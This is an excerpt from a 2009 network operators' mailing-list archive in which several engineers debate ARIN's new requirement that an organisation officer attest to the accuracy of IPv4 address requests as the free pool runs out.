- a plan to migrate customers to IPv6
- automatic allocation of IPv6 range instead of IPv4 for those who  
can't do so.

ie.  No more IPv4 for you until you've shown IPv6 clue.

Then people can't just get away with driving into the brick wall of  
IPv4-allocation fail.

(Not sure if I'm serious about this suggestion, but it's there now).

MMC


On 21/04/2009, at 9:09 AM, Joe Greco wrote:



 Let me see if I can understand this.

 We're running out of IPv4 space.

 Knowing that blatant lying about IP space justifications has been an
 ongoing game in the community, ARIN has decided to do something  
 about
 it.

 So now they're going to require an attestation.  Which means that they
 are going to require an officer to attest to the validity of the
 information.

 So the officer, most likely not being a technical person, is going  
 to
 contact ...  probably the same people who made the request, ask them  
 if
 they need the space.  Right?

 And why would the answer be any different, now?

 ... JG
 -- 
 Joe Greco - sol.net Network Services - Milwaukee, WI - http://www.sol.net
 We call it the 'one bite at the apple' rule. Give me one chance  
 [and] then I
 won't contact you again. - Direct Marketing Ass'n position on e- 
 mail spam(CNN)
 With 24 million small businesses in the US alone, that's way too  
 many apples.


-- 
Matthew Moyle-Croft
Networks, Internode/Agile
Level 5, 162 Grenfell Street, Adelaide, SA 5000 Australia
Email: m...@internode.com.auWeb: http://www.on.net
Direct: +61-8-8228-2909  Mobile: +61-419-900-366
Reception: +61-8-8228-2999Fax: +61-8-8235-6909





Re: Important New Requirement for IPv4 Requests

2009-04-20 Thread Jo Rhett

On Apr 20, 2009, at 4:39 PM, Joe Greco wrote:
So the officer, most likely not being a technical person, is going  
to
contact ...  probably the same people who made the request, ask them  
if

they need the space.  Right?

And why would the answer be any different, now?



This is exactly identical to having the CEO signed the quarterly  
statements.  You are saying this is Right.  The CEO couldn't do that  
accounting him/herself -- but they're going to ask more questions and  
be more cautious before putting their name on it.


I applaud this idea.  I wish we had done it 10 years ago, but it's not  
too late to start.  Before late than never.


--
Jo Rhett
Net Consonance : consonant endings by net philanthropy, open source  
and other randomness







Re: Important New Requirement for IPv4 Requests

2009-04-20 Thread Carl Ford
Same reason urgent action networks work for amnesty International.

Because when someone thinks other people are watching, truth is revealed.

Kind Regards,

Carl

On Mon, Apr 20, 2009 at 7:39 PM, Joe Greco jgr...@ns.sol.net wrote:

 Forwarded message:
  Subject: Important New Requirement for IPv4 Requests
  From: ARIN Registration Services do-not-re...@arin.net
 
  Hello,
 
  With the approaching depletion of the IPv4 address free pool, the
  ARIN Board of Trustees has directed ARIN staff to take additional
  steps to ensure the legitimacy of all IPv4 address space requests.
  Beginning 18 May 2009, ARIN will require that all applications for
  IPv4 address space include an attestation of accuracy from an officer
  of the organization. For more information on this requirement, please
  see:
 
  https://www.arin.net/resources/agreements/officer_attest.html
 
  Whenever a request for IPv4 resources is received, ARIN will ask in
  its initial reply for the name and contact information of an officer
  of the organization who will be able to attest to the validity of the
  information provided to ARIN.
 
  At the point a request is ready to be approved, ARIN will send a summary
  of the request (via e-mail) to the officer with a cc: to the requesting
  POC (Tech or Admin) and ask the officer to attest to the validity of the
  information provided to ARIN. The summary will provide a brief overview
  of the request and an explanation of the required attestation. ARIN will
  include the original request template and any other relevant information
  the requestor provided.  Once ARIN receives the attestation from the
  officer, the request can be approved. Attestation may also be provided
  via fax or postal mail.
 
  For further assistance, contact ARIN's Registration Services Help Desk
  via e-mail to hostmas...@arin.net or telephone at +1.703.227.0660.

 Let me see if I can understand this.

 We're running out of IPv4 space.

 Knowing that blatant lying about IP space justifications has been an
 ongoing game in the community, ARIN has decided to do something about
 it.

 So now they're going to require an attestation.  Which means that they
 are going to require an officer to attest to the validity of the
 information.

 So the officer, most likely not being a technical person, is going to
 contact ...  probably the same people who made the request, ask them if
 they need the space.  Right?

 And why would the answer be any different, now?

 ... JG
 --
 Joe Greco - sol.net Network Services - Milwaukee, WI - http://www.sol.net
 We call it the 'one bite at the apple' rule. Give me one chance [and] then
 I
 won't contact you again. - Direct Marketing Ass'n position on e-mail
 spam(CNN)
 With 24 million small businesses in the US alone, that's way too many
 apples.